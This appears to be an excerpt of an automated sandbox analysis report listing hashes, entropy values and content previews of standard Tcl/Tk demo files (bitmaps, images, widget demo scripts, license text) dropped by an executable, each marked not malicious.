Preview:	#define flagup_width 48.#define flagup_height 48.static char flagup_bits[] = {. 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xe0, 0x7f, 0x00,. 0x00, 0x00, 0x00, 0xe0, 0x7f, 0x00, 0x00, 0x00, 0x00, 0xef, 0x6a, 0x00,. 0x00, 0x00, 0xc0, 0x7b, 0x75, 0x00, 0x00, 0x00, 0xe0, 0xe0, 0x6a, 0x00,. 0x00, 0x00, 0x30, 0x60, 0x75, 0x00, 0x00, 0x00, 0x18, 0xe0, 0x7f, 0x00,. 0x00, 0x00, 0x0c, 0xe0, 0x7f, 0x00, 0x00, 0x00, 0x06, 0xe0, 0x04, 0x00,. 0x00, 0x00, 0x03, 0xe0, 0x04, 0x00, 0x00, 0x80, 0x01, 0xe0, 0x06, 0x00,. 0x00, 0xc0, 0x1f, 0xe0, 0x07, 0x00, 0x00, 0xe0, 0x7f, 0xe0, 0x07, 0x00,. 0x00, 0x70, 0xe0, 0xe0, 0x05, 0x00, 0x00, 0x38, 0x80, 0xe1, 0x04, 0x00,. 0x00, 0x18, 0x80, 0xf1, 0x04, 0x00, 0x00, 0x0c, 0x00, 0xfb, 0x04, 0x00,. 0x00, 0x0c, 0x00, 0xff, 0x04, 0x00, 0x00, 0x86, 0x1f, 0xee, 0x04, 0x00,. 0x00, 0x06, 0x06, 0xe6, 0x04, 0x00, 0x00, 0x06, 0x00, 0xe6, 0x04, 0x00,. 0x00, 0x06, 0x00, 0xe6, 0x04, 0x00, 0x00, 0x06, 0x00, 0x66, 0x04, 0x00,. 0x7f, 0x56, 0x52,

C:\Users\user\Desktop\tk\demos\images\gray25.xbm Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	275
Entropy (8bit):	3.8140822622567194
Encrypted:	false
SSDEEP:	6:HeA4Y634hBSA9x5AdDdRxdDdRxdDdRaAdDdRxdDdRxdDdRaAdDdRxdDdRV:HeH9IhCBhBhB5BhBhB5BhBX
MD5:	2D5D17B53D2211CCC9B0B2DD9546A7F8
SHA1:	CCCA589A1C0CE30017FC6AB78D5DB55A1D5DCB69
SHA-256:	A1A6CF0CA4D94FEA1E7DB4C7F6FD40A58B312E1DE34CCBD582038DEFCB3027E2
SHA-512:	D9BB5874701E814D29335A0CA5F90E0F56D845F100B95ECB3973A7808E46945DAFC760550D3F06BA81BEF8C439A1E810C80ADA0B23B9207E617773051EF50371
Malicious:	false
Preview:	#define grey_width 16.#define grey_height 16.static char grey_bits[] = {. 0x11, 0x11, 0x44, 0x44, 0x11, 0x11, 0x44, 0x44, 0x11, 0x11, 0x44, 0x44,. 0x11, 0x11, 0x44, 0x44, 0x11, 0x11, 0x44, 0x44, 0x11, 0x11, 0x44, 0x44,. 0x11, 0x11, 0x44, 0x44, 0x11, 0x11, 0x44, 0x44};.

C:\Users\user\Desktop\tk\demos\images\letters.xbm Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1883
Entropy (8bit):	2.765005219702847
Encrypted:	false
SSDEEP:	12:HeyOTMD2vUdoAepgL8RRgLeTH/xYpi8G3Lihj:GMDFSkL8cLe7xYpisN
MD5:	00ED12C39D1312612779D3194A8FBFA1
SHA1:	FC4E88BD05DA56A8A464E117D8C6FDB6626360C8
SHA-256:	73C825A802DB366BEEDC038BBE944F61F8BBE540BAB8720CB568306E4CEE5195
SHA-512:	22298C191BBCD3F947205E39B68E91A6261EC226BEEB8A19778A2854292BFC8242B99042E04AC0683A8977C62FC913C8A1643F563BEBD14445D842C5DACA9A44
Malicious:	false
Preview:	#define letters_width 48.#define letters_height 48.static char letters_bits[] = {. 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,. 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,. 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,. 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,. 0x00, 0xfe, 0xff, 0xff, 0xff, 0x3f, 0x00, 0x02, 0x00, 0x00, 0x00, 0x20,. 0x00, 0xfa, 0x00, 0x00, 0x00, 0x2e, 0x00, 0x02, 0x00, 0x00, 0x00, 0x2a,. 0x00, 0x3a, 0x00, 0x00, 0x00, 0x2a, 0x00, 0x02, 0x00, 0x00, 0x00, 0x2e,. 0xe0, 0xff, 0xff, 0xff, 0xff, 0x21, 0x20, 0x00, 0x00, 0x00, 0x00, 0x21,. 0xa0, 0x03, 0x00, 0x00, 0x70, 0x21, 0x20, 0x00, 0x00, 0x00, 0x50, 0x21,. 0xa0, 0x1f, 0x00, 0x00, 0x50, 0x21, 0x20, 0x00, 0x00, 0x00, 0x70, 0x21,. 0xfe, 0xff, 0xff, 0xff, 0x0f, 0x21, 0x02, 0x00, 0x00, 0x00, 0x08, 0x21,. 0xfa, 0x01, 0x00, 0x80, 0x0b, 0x21, 0x02, 0x00, 0x00, 0x80, 0x0a, 0x21,. 0xba, 0x01, 0x0

C:\Users\user\Desktop\tk\demos\images\noletter.xbm Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1889
Entropy (8bit):	3.0189941426046545
Encrypted:	false
SSDEEP:	24:MiFlMPgBnGA7vsUrCk4LZfydFpwcy1wrruomWtGmZbX:3ggBnGA74Ll2y1t3mZbX
MD5:	1D99D624AC1AF295F1529C8857439D36
SHA1:	E67C3A8898448F59B8BB125B1C5C7BB41CEB01D4
SHA-256:	741C936C628F6B0DD9295FEC63F8D3BAEC6D529A1E9DCD7398680AAA284755DD
SHA-512:	DC41A5430D58F64A33441C6F2D46905CFC240685444DABA72314F51E40EABE090358597D189882C11EE34105ECF0FF5ECC15887BD8CDA37259CD7E3DF193225B
Malicious:	false
Preview:	#define noletters_width 48.#define noletters_height 48.static char noletters_bits[] = {. 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xf0, 0x1f, 0x00, 0x00,. 0x00, 0x00, 0xff, 0xff, 0x01, 0x00, 0x00, 0xc0, 0xff, 0xff, 0x07, 0x00,. 0x00, 0xf0, 0x0f, 0xe0, 0x1f, 0x00, 0x00, 0xfc, 0x01, 0x00, 0x7f, 0x00,. 0x00, 0x3e, 0x00, 0x00, 0xf8, 0x00, 0x00, 0x1f, 0x00, 0x00, 0xf0, 0x01,. 0x80, 0x07, 0x00, 0x00, 0xc0, 0x03, 0xc0, 0x03, 0x00, 0x00, 0xe0, 0x07,. 0xe0, 0x01, 0x00, 0x00, 0xf0, 0x0f, 0xe0, 0x00, 0x00, 0x00, 0x78, 0x0e,. 0xf0, 0x00, 0x00, 0x00, 0x3c, 0x1e, 0x70, 0x00, 0x00, 0x00, 0x1e, 0x1c,. 0x38, 0x00, 0x00, 0x00, 0x0f, 0x38, 0x38, 0x00, 0x00, 0x80, 0x07, 0x38,. 0x3c, 0xfc, 0xff, 0xff, 0x7f, 0x78, 0x1c, 0x04, 0x00, 0xe0, 0x41, 0x70,. 0x1c, 0x04, 0x00, 0xf0, 0x40, 0x70, 0x1c, 0x74, 0x00, 0x78, 0x4e, 0x70,. 0x0e, 0x04, 0x00, 0x3c, 0x4a, 0xe0, 0x0e, 0x74, 0x03, 0x1e, 0x4a, 0xe0,. 0x0e, 0x04, 0x00, 0x0f, 0x4e, 0xe0, 0x0e, 0x04, 0x80, 0x07, 0x40, 0xe0,. 0x0e, 0x0

C:\Users\user\Desktop\tk\demos\images\pattern.xbm Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	272
Entropy (8bit):	4.0572687974911705
Encrypted:	false
SSDEEP:	6:HeA2SM6326BSHxy9zkvLJuwAdbtdmdhdLJEWJvUIY9nT:HeHSpG6cr1uwsKJjM
MD5:	47458D2A0009C326F24A100B4E03AD8A
SHA1:	7B24C26ED39EA62949537CE0F282C0237F124F03
SHA-256:	8006C9CDBB7AAB7E1C0B48289FFF41437E3E730F9822FC8E72ACB22EF6BC5808
SHA-512:	091DE01A63C459433A3FBDAEF9F615675EF6B5D032B4A4904E3590898755FB812FBBB5CA6DF52B0CD226A088B642634D6A657664DA2E76E3FCB0CCF4A2CC1207
Malicious:	false
Preview:	#define foo_width 16.#define foo_height 16.static char foo_bits[] = {. 0x60, 0x06, 0x90, 0x09, 0x90, 0x09, 0xb0, 0x0d, 0x4e, 0x72, 0x49, 0x92,. 0x71, 0x8e, 0x8e, 0x71, 0x8e, 0x71, 0x71, 0x8e, 0x49, 0x92, 0x4e, 0x72,. 0xb0, 0x0d, 0x90, 0x09, 0x90, 0x09, 0x60, 0x06};.

C:\Users\user\Desktop\tk\demos\images\tcllogo.gif Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2341
Entropy (8bit):	6.9734417899888665
Encrypted:	false
SSDEEP:	48:qF/mIXn3l7+ejbL/4nZEsKPKer1OPQqVRqJbPpRRKOv/UVO47f:81nHL4T0KorxvRKkc847f
MD5:	FF04B357B7AB0A8B573C10C6DA945D6A
SHA1:	BCB73D8AF2628463A1B955581999C77F09F805B8
SHA-256:	72F6B34D3C8F424FF0A290A793FCFBF34FD5630A916CD02E0A5DDA0144B5957F
SHA-512:	10DFE631C5FC24CF239D817EEFA14329946E26ED6BCFC1B517E2F9AF81807977428BA2539AAA653A89A372257D494E8136FD6ABBC4F727E6B199400DE05ACCD5
Malicious:	false
Preview:	GIF89aD.d...............f..3.............f..3..............f..3....f..f..f..ff.f3.f..3..3..3..3f.33.3............f..3..............f..3.............f..3..........f.3...f..f..f..ff.f3.f..3..3..3..3f.33.3............f..3.............f..3............f..3.............f..3....f..f.f..ff.f3.f..3..3.3..3f.33.3...........f..3...f..f..f..f.ff.3f..f..f..f.f.ff.3f..f..f..f..f.ff.3f..ff.ff.ff.fffff3ff.f3.f3.f3.f3ff33f3.f..f..f..f.ff.3f..3..3..3..3.f3.33..3..3..3.3.f3.33..3..3..3..3.f3.33..3f.3f.3f.3ff3f33f.33.33.33.33f33333.3..3..3..3.f3.33.............f..3.............f..3..............f..3....f..f..f..ff.f3.f..3..3..3..3f.33.3............f..3...............w..U..D..".....................w..U..D..".....................w..U..D..".................wwwUUUDDD"""......,....D.d........H......\...z..Ht@Q...92.p...z.$.@@.E..u.Y.2..0c..q.cB.,[..... ..1..qbM.2~].....s...S.@.L.j..#..\......h..........].D(..m......@.Z....oO...3=.c...G".(..pL...q]..%....[...#...+...X.h....^.....

C:\Users\user\Desktop\tk\demos\images\teapot.ppm Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	196623
Entropy (8bit):	6.174884800123863
Encrypted:	false
SSDEEP:	1536:z8xfYZ2Vasi+bDh8vNJo9ZHXAUB76BouxvRV+zwevb9:zgVaD+bDh8LonXAUByFxvVevB
MD5:	63890ED702E99F27B50BAD505DD81D0E
SHA1:	C0BCEBBD7198E55822BE80F862308C67449F92BF
SHA-256:	786F29B88771E439187DD2E86AD4D255DD185E0C1EA3F8C37D21770FD1DF253A
SHA-512:	7030AE1A5CA6A4E929950EEC0A70C41A14D24231CEC1573B6F24D10E5A728A96C25A164877063DF10AC18ABC605699018445A7339FEADF8B4B910F60D2FF047D
Malicious:	false
Preview:	P6.256 256.255..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..

C:\Users\user\Desktop\tk\demos\items.tcl Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	9724
Entropy (8bit):	4.921887953969762
Encrypted:	false
SSDEEP:	192:0O/DtvqfFGqFXdvyVxtT4zffvCfow/fx4vfMgfhd+ht2xIKYCfO7gm6QAHZbsYlk:0wxvUFHFXdvs4LiB/pAhpW7KYCm7g9Q/
MD5:	72CA57A74F49AE989CFF21FF7B72EFDC
SHA1:	5D38EEBB3B1964C072C2F339A004C5C5E2DDA73D
SHA-256:	3D14ACE97CBE61F2125F4B11C74C70A09A14985022912400F2089063D7EBF532
SHA-512:	F1542B4C29729F598FA6008C82023305DF6AAD4DFCDBA6780836CED05A75596C1013CD1DFFAC611E20801724DCF1163E8D07AC382FD272D8CC50E8E732BAB2AF
Malicious:	false
Preview:	# items.tcl --.#.# This demonstration script creates a canvas that displays the.# canvas item types...if {![info exists widgetDemo]} {. error "This script should be run from the \"widget\" demo.".}..package require Tk..set w .items.catch {destroy $w}.toplevel $w.wm title $w "Canvas Item Demonstration".wm iconname $w "Items".positionWindow $w.set c $w.frame.c..label $w.msg -font $font -wraplength 5i -justify left -text "This window contains a canvas widget with examples of the various kinds of items supported by canvases. The following operations are supported:\n Button-1 drag:\tmoves item under pointer.\n Button-2 drag:\trepositions view.\n Button-3 drag:\tstrokes out area.\n Ctrl+f:\t\tprints items under area.".pack $w.msg -side top..## See Code / Dismiss buttons.set btns [addSeeDismiss $w.buttons $w].pack $btns -side bottom -fill x..frame $w.frame.pack $w.frame -side top -fill both -expand yes..canvas $c -scrollregion {0c 0c 30c 24c} -width 15c -height 10c \..-relief sunken -

C:\Users\user\Desktop\tk\demos\ixset Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	8095
Entropy (8bit):	4.82199456125992
Encrypted:	false
SSDEEP:	192:vK/fALdwDD0FMe0N3RF8o5w5oVUPPEtfg:cuK/0D0N3n8o3K
MD5:	9B7854A205251DA969328087FA6A4B9F
SHA1:	7D6989546CBC1BDE008E6C4C0A7E0E60AB344AC3
SHA-256:	805BEE384C10F768F8E6AFC6D680842BB36D5244A58F2B5474D3FAF9F4A6CE56
SHA-512:	0C9F1E54F3265DB9757CE0BFF50F8C61F7A9F3C67ECFCE1148A946383B5C3E35F9138BC1FEFC8DCCBE6FE56E9B23E9E3EBA77980BCE9F854F667B553A3826D85
Malicious:	false
Preview:	#!/bin/sh.# the next line restarts using wish \.exec wish "$0" ${1+"$@"}..# ixset --.# A nice interface to "xset" to change X server settings.#.# History :.# 91/11/23 : pda@masi.ibp.fr, jt@ratp.fr : design.# 92/08/01 : pda@masi.ibp.fr : cleaning..package require Tcl 8.4.package require Tk..#.# Button actions.#..proc quit {} {. destroy ..}..proc ok {} {. writesettings. quit.}..proc cancel {} {. readsettings. dispsettings. .buttons.apply configure -state disabled. .buttons.cancel configure -state disabled.}..proc apply {} {. writesettings. .buttons.apply configure -state disabled. .buttons.cancel configure -state disabled.}..#.# Read current settings.#..proc readsettings {} {. global kbdrep ;.set kbdrep."on". global kbdcli ;.set kbdcli.0. global bellvol ;.set bellvol.100. global bellpit ;.set bellpit.440. global belldur ;.set belldur.100. global mouseacc ;.set mouseacc."3/1". global mousethr ;.set mousethr.4. global screenbla ;.se

C:\Users\user\Desktop\tk\demos\knightstour.tcl Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	8586
Entropy (8bit):	4.703040226939287
Encrypted:	false
SSDEEP:	192:wp00XiQkeiQkD+IT+gyiQKKFLG+XYQc5EfNCAeshd0M6qkxKMDOwk3Xx1QVwitPK:wa0FIT+ZYZQOWyqADJ+x0+jYq0E
MD5:	B4CE69E4FFBF97ECE9D6571ACAF67FCD
SHA1:	9BB4F933F499C8A3C26B75DC4AB6783FC67CFB4F
SHA-256:	9D4B59F04C1A79F2B7EC317E514820AB627F47A629D90C85AE1AC96EE87DE50E
SHA-512:	E3BCB50D477438C2DD97548B534D1E82C332E23FF059C13B3A608576661629728D020C594F48D6B0BB7CAF2BBE18FD3692AE9779CE741ED16DF915FD3F1B01E5
Malicious:	false
Preview:	# Copyright (C) 2008 Pat Thoyts <patthoyts@users.sourceforge.net>.#.#.Calculate a Knight's tour of a chessboard..#.#.This uses Warnsdorff's rule to calculate the next square each.#.time. This specifies that the next square should be the one that.#.has the least number of available moves..#.#.Using this rule it is possible to get to a position where.#.there are no squares available to move into. In this implementation.#.this occurs when the starting square is d6..#.#.To solve this fault an enhancement to the rule is that if we.#.have a choice of squares with an equal score, we should choose.#.the one nearest the edge of the board..#.#.If the call to the Edgemost function is commented out you can see.#.this occur..#.#.You can drag the knight to a specific square to start if you wish..#.If you let it repeat then it will choose random start positions.#.for each new tour...package require Tk 8.5..# Return a list of accessible squares from a given square.proc ValidMoves {square} {. set mo

C:\Users\user\Desktop\tk\demos\label.tcl Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1318
Entropy (8bit):	4.787113863168504
Encrypted:	false
SSDEEP:	24:D14I/xXeVXep1KkRbhz4cJcjLNMjT1p8ADwlBHlnqtrfFJxycoL+Dg8JP9qKtxv3:pZ5Xey8O42cjRMjTUADwlJlqtbFJxycp
MD5:	51D58DE375F70505A7A28D12D911C50A
SHA1:	96042108369FDDB2E06F2A6567A652231F73FD2E
SHA-256:	1FE118C142BC44C208C3C87DC2924829B9713808094CC03E8E23EF705310D3FE
SHA-512:	AB0891C5AE1AB7BD144F180617A1B6D9F7099B9849E36536E0CBDF612C154EAE17CA6F2C7C60034A8B9AB95982168F529F0ACFAD7440318D9D1C95475DBF5E13
Malicious:	false
Preview:	# label.tcl --.#.# This demonstration script creates a toplevel window containing.# several label widgets...if {![info exists widgetDemo]} {. error "This script should be run from the \"widget\" demo.".}..package require Tk..set w .label.catch {destroy $w}.toplevel $w.wm title $w "Label Demonstration".wm iconname $w "label".positionWindow $w..label $w.msg -font $font -wraplength 4i -justify left -text "Five labels are displayed below: three textual ones on the left, and a bitmap label and a text label on the right. Labels are pretty boring because you can't do anything with them.".pack $w.msg -side top..## See Code / Dismiss buttons.set btns [addSeeDismiss $w.buttons $w].pack $btns -side bottom -fill x..frame $w.left.frame $w.right.pack $w.left $w.right -side left -expand yes -padx 10 -pady 10 -fill both..label $w.left.l1 -text "First label".label $w.left.l2 -text "Second label, raised" -relief raised.label $w.left.l3 -text "Third label, sunken" -relief sunken.pack $w.left.l1 $w.le

C:\Users\user\Desktop\tk\demos\labelframe.tcl Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1847
Entropy (8bit):	4.752927501521251
Encrypted:	false
SSDEEP:	48:sZsXeV85pjnQDoOTPVFEgog+abeww7juOyykp3WUOIkw89:FOu/ETPDEgo3/z7jutp3WUOIk/
MD5:	84C5AE01935052BAF7BE97E586FF9CD9
SHA1:	F605AE473D80A7C30D00FD596D247666FE10B9E7
SHA-256:	A964CD6526509801CD0873A63FE23FAFD6D959136FD046133F480AF2C6359B24
SHA-512:	539A92652FB6CBBF964B240382C42F6B0EB9E99DE1465548359D4568CFDFEDDC635A3A55C70862F7AFD5C09A6EFB032864581E1E715768437024CDF85D7FC04C
Malicious:	false
Preview:	# labelframe.tcl --.#.# This demonstration script creates a toplevel window containing.# several labelframe widgets...if {![info exists widgetDemo]} {. error "This script should be run from the \"widget\" demo.".}..package require Tk..set w .labelframe.catch {destroy $w}.toplevel $w.wm title $w "Labelframe Demonstration".wm iconname $w "labelframe".positionWindow $w..# Some information..label $w.msg -font $font -wraplength 4i -justify left -text "Labelframes are\..used to group related widgets together. The label may be either \..plain text or another widget.".pack $w.msg -side top..## See Code / Dismiss buttons.set btns [addSeeDismiss $w.buttons $w].pack $btns -side bottom -fill x..# Demo area..frame $w.f.pack $w.f -side bottom -fill both -expand 1.set w $w.f..# A group of radiobuttons in a labelframe..labelframe $w.f -text "Value" -padx 2 -pady 2.grid $w.f -row 0 -column 0 -pady 2m -padx 2m..foreach value {1 2 3 4} {. radiobutton $w.f.b$value -text "This is value $value" \.

C:\Users\user\Desktop\tk\demos\license.terms Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2208
Entropy (8bit):	5.100926243789827
Encrypted:	false
SSDEEP:	48:ox3uZcRTvy3DauG4+bHnr32s3eGw8YKxPiOXR3ojdS+mFf:hcFaz+bL3e8n3XR3ojdtOf
MD5:	8B74B116CD5C4334D08F62B9265A482D
SHA1:	D1C745B315BF5B14BBD61C002BD6BE33426EA9B4
SHA-256:	4D337CAE08517060A21E404CDBACE9C4EA191E57BA0638864473F01E67C9F457
SHA-512:	0E52ACED6739375F3D1A3D33333292F0DB03249AE138CCFE96437C6908D1594CA311587542FCEC5ADBC254BB5D7C1BF3976352AB86A2B23DBAB0D9BA05100470
Malicious:	false
Preview:	This software is copyrighted by the Regents of the University of.California, Sun Microsystems, Inc., and other parties. The following.terms apply to all files associated with the software unless explicitly.disclaimed in individual files...The authors hereby grant permission to use, copy, modify, distribute,.and license this software and its documentation for any purpose, provided.that existing copyright notices are retained in all copies and that this.notice is included verbatim in any distributions. No written agreement,.license, or royalty fee is required for any of the authorized uses..Modifications to this software may be copyrighted by their authors.and need not follow the licensing terms described here, provided that.the new terms are clearly indicated on the first page of each file where.they apply...IN NO EVENT SHALL THE AUTHORS OR DISTRIBUTORS BE LIABLE TO ANY PARTY.FOR DIRECT, INDIRECT, SPECIAL, INCIDENTAL, OR CONSEQUENTIAL DAMAGES.ARISING OUT OF THE USE OF THIS SOFTWARE, IT

C:\Users\user\Desktop\tk\demos\mclist.tcl Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	3986
Entropy (8bit):	4.8118914758031615
Encrypted:	false
SSDEEP:	96:nAOVDTjfXOHD9/c4hjpJSt4A0/XcP2og7:nAORTjwx/ooYg7
MD5:	BF3E5D50CAF08020CF315DF61C7E44D4
SHA1:	C5CFD97518A56FB0AA861C139645F18CB5669A5E
SHA-256:	AB8200D491A5D1CDFBCAE961ACB66A7EE121074F4F716C5D5BEC8EAB92132392
SHA-512:	A6967CEF69B9C08ECA401E8F9DC776FF74D69C39E386202C87F2DD952C09D053A59B2951AB2027D07BCDA9294257FE6A65B4F12F20A1FC35174F0B1C02927B44
Malicious:	false
Preview:	# mclist.tcl --.#.# This demonstration script creates a toplevel window containing a Ttk.# tree widget configured as a multi-column listbox...if {![info exists widgetDemo]} {. error "This script should be run from the \"widget\" demo.".}..package require Tk.package require Ttk..set w .mclist.catch {destroy $w}.toplevel $w.wm title $w "Multi-Column List".wm iconname $w "mclist".positionWindow $w..## Explanatory text.ttk::label $w.msg -font $font -wraplength 4i -justify left -anchor n -padding {10 2 10 6} -text "Ttk is the new Tk themed widget set. One of the widgets it includes is a tree widget, which can be configured to display multiple columns of informational data without displaying the tree itself. This is a simple way to build a listbox that has multiple columns. Clicking on the heading for a column will sort the data by that column. You can also change the width of the columns by dragging the boundary between them.".pack $w.msg -fill x..## See Code / Dismiss.pack [addSeeDismis

C:\Users\user\Desktop\tk\demos\menu.tcl Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	6730
Entropy (8bit):	4.816127499774257
Encrypted:	false
SSDEEP:	96:aA4OxsB1iF4u4niP/uOPny/KTYTXQZoVcXGLwy8LgnKYWeICXQh92Uk97QohRuw:aA4OxsQ4u4UGOfy4deSgnKoAhgUS/
MD5:	7AC9E4A92AAE30A1B8B1DB3E7D5D9CB9
SHA1:	7990FA20D8437EE8389F4FF5195969CDCB9F7E30
SHA-256:	35B226F427C09FF3B9556654C1FB450CBD65FD6F7A2EAF33679FAEE027C410D0
SHA-512:	6F75362FBED3C5B6FA942675C29F54FAFE09AED31039CDD2E2C1CC47DAF2CC86C98FA7AFCF8FB1DFD8C07C758593E250CB6F15B1A8031BEABF5DFAE2EB32B41E
Malicious:	false
Preview:	# menu.tcl --.#.# This demonstration script creates a window with a bunch of menus.# and cascaded menus using menubars...if {![info exists widgetDemo]} {. error "This script should be run from the \"widget\" demo.".}..package require Tk..set w .menu.catch {destroy $w}.toplevel $w.wm title $w "Menu Demonstration".wm iconname $w "menu".positionWindow $w..label $w.msg -font $font -wraplength 4i -justify left .if {[tk windowingsystem] eq "aqua"} {. catch {set origUseCustomMDEF $::tk::mac::useCustomMDEF; set ::tk::mac::useCustomMDEF 1}. $w.msg configure -text "This window has a menubar with cascaded menus. You can invoke entries with an accelerator by typing Command+x, where \"x\" is the character next to the command key symbol. The rightmost menu can be torn off into a palette by selecting the first item in the menu.".} else {. $w.msg configure -text "This window contains a menubar with cascaded menus. You can post a menu from the keyboard by typing Alt+x, where \"x\" is the

C:\Users\user\Desktop\tk\demos\menubu.tcl Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	4477
Entropy (8bit):	4.901803094114996
Encrypted:	false
SSDEEP:	96:nAHOnya1iw8QJDScCJErDjRFgQV1fw5atJCU5GYGQZGtuw:nAHOn0QNgyrxFgAfw5Y5GjwGT
MD5:	26A5E76F1B484418561846CB17F20D14
SHA1:	E88F07AF20BE98601130F43A1B247293C311600C
SHA-256:	04B23D501F7DE9761DFF21B2F413A7A201073727680E35F28E9721E8D589A0B6
SHA-512:	7411C6C05AD52E861CFBF37494C16731BC8238E9EAACED190BFAFF9DF649A4122AF07D524CBFD89C4DDD25B1BE026A980823D7F982B1A1AC8E498D1909515AC0
Malicious:	false
Preview:	# menubu.tcl --.#.# This demonstration script creates a window with a bunch of menus.# and cascaded menus using menubuttons...if {![info exists widgetDemo]} {. error "This script should be run from the \"widget\" demo.".}..package require Tk..set w .menubu.catch {destroy $w}.toplevel $w.wm title $w "Menu Button Demonstration".wm iconname $w "menubutton".positionWindow $w..frame $w.body.pack $w.body -expand 1 -fill both.if {[tk windowingsystem] eq "aqua"} {catch {set origUseCustomMDEF $::tk::mac::useCustomMDEF; set ::tk::mac::useCustomMDEF 1}}..menubutton $w.body.below -text "Below" -underline 0 -direction below -menu $w.body.below.m -relief raised.menu $w.body.below.m -tearoff 0 .$w.body.below.m add command -label "Below menu: first item" -command "puts \"You have selected the first item from the Below menu.\"".$w.body.below.m add command -label "Below menu: second item" -command "puts \"You have selected the second item from the Below menu.\"".grid $w.body.below -row 0 -column 1 -s

C:\Users\user\Desktop\tk\demos\msgbox.tcl Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2023
Entropy (8bit):	4.7973632581682075
Encrypted:	false
SSDEEP:	48:BX77rxXeGW1eb8A0RA9TgIZYDw4M7oSTzc2UiTFawTfayDcFgOKnu43yQf6e:BPrxOV1eAiTjZYsREbCAwbJcRmxbp
MD5:	CF0D47C43D546DDE09200C15E6FF78DD
SHA1:	C2077A8C3D40C7414A779923AB21623AE216D245
SHA-256:	FDBF7420264ACF32CE5CDD5596F0088B46569A225C02D878417BEE44961F586E
SHA-512:	D79D1A63B5283717A9F4F41A63951945A3B5C860ECCB42852A32B3DF3E23BD2AB7ED44496696D9BBDADB6BAE669B003BC47EF36CC18781669217DAC3C9F96C21
Malicious:	false
Preview:	# msgbox.tcl --.#.# This demonstration script creates message boxes of various type..if {![info exists widgetDemo]} {. error "This script should be run from the \"widget\" demo.".}..package require Tk.package require Ttk..set w .msgbox.catch {destroy $w}.toplevel $w.wm title $w "Message Box Demonstration".wm iconname $w "messagebox".positionWindow $w..label $w.msg -font $font -wraplength 4i -justify left -text "Choose the icon and type option of the message box. Then press the \"Message Box\" button to see the message box.".pack $w.msg -side top..pack [addSeeDismiss $w.buttons $w {} {. ttk::button $w.buttons.vars -text "Message Box" -command "showMessageBox $w".}] -side bottom -fill x.#pack $w.buttons.dismiss $w.buttons.code $w.buttons.vars -side left -expand 1..frame $w.left .frame $w.right.pack $w.left $w.right -side left -expand yes -fill y -pady .5c -padx .5c..label $w.left.label -text "Icon".frame $w.left.sep -relief ridge -bd 1 -height 2.pack $w.left.label -side top.pack $

C:\Users\user\Desktop\tk\demos\nl.msg Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	6769
Entropy (8bit):	4.652001652620473
Encrypted:	false
SSDEEP:	192:NDRWCV+fMcXoteIORoa53akmRO+X8Bt+YnvEO1:1V+74tXah53akmRPO1
MD5:	46B5EEE2E4EBD6F602728FDA684BD428
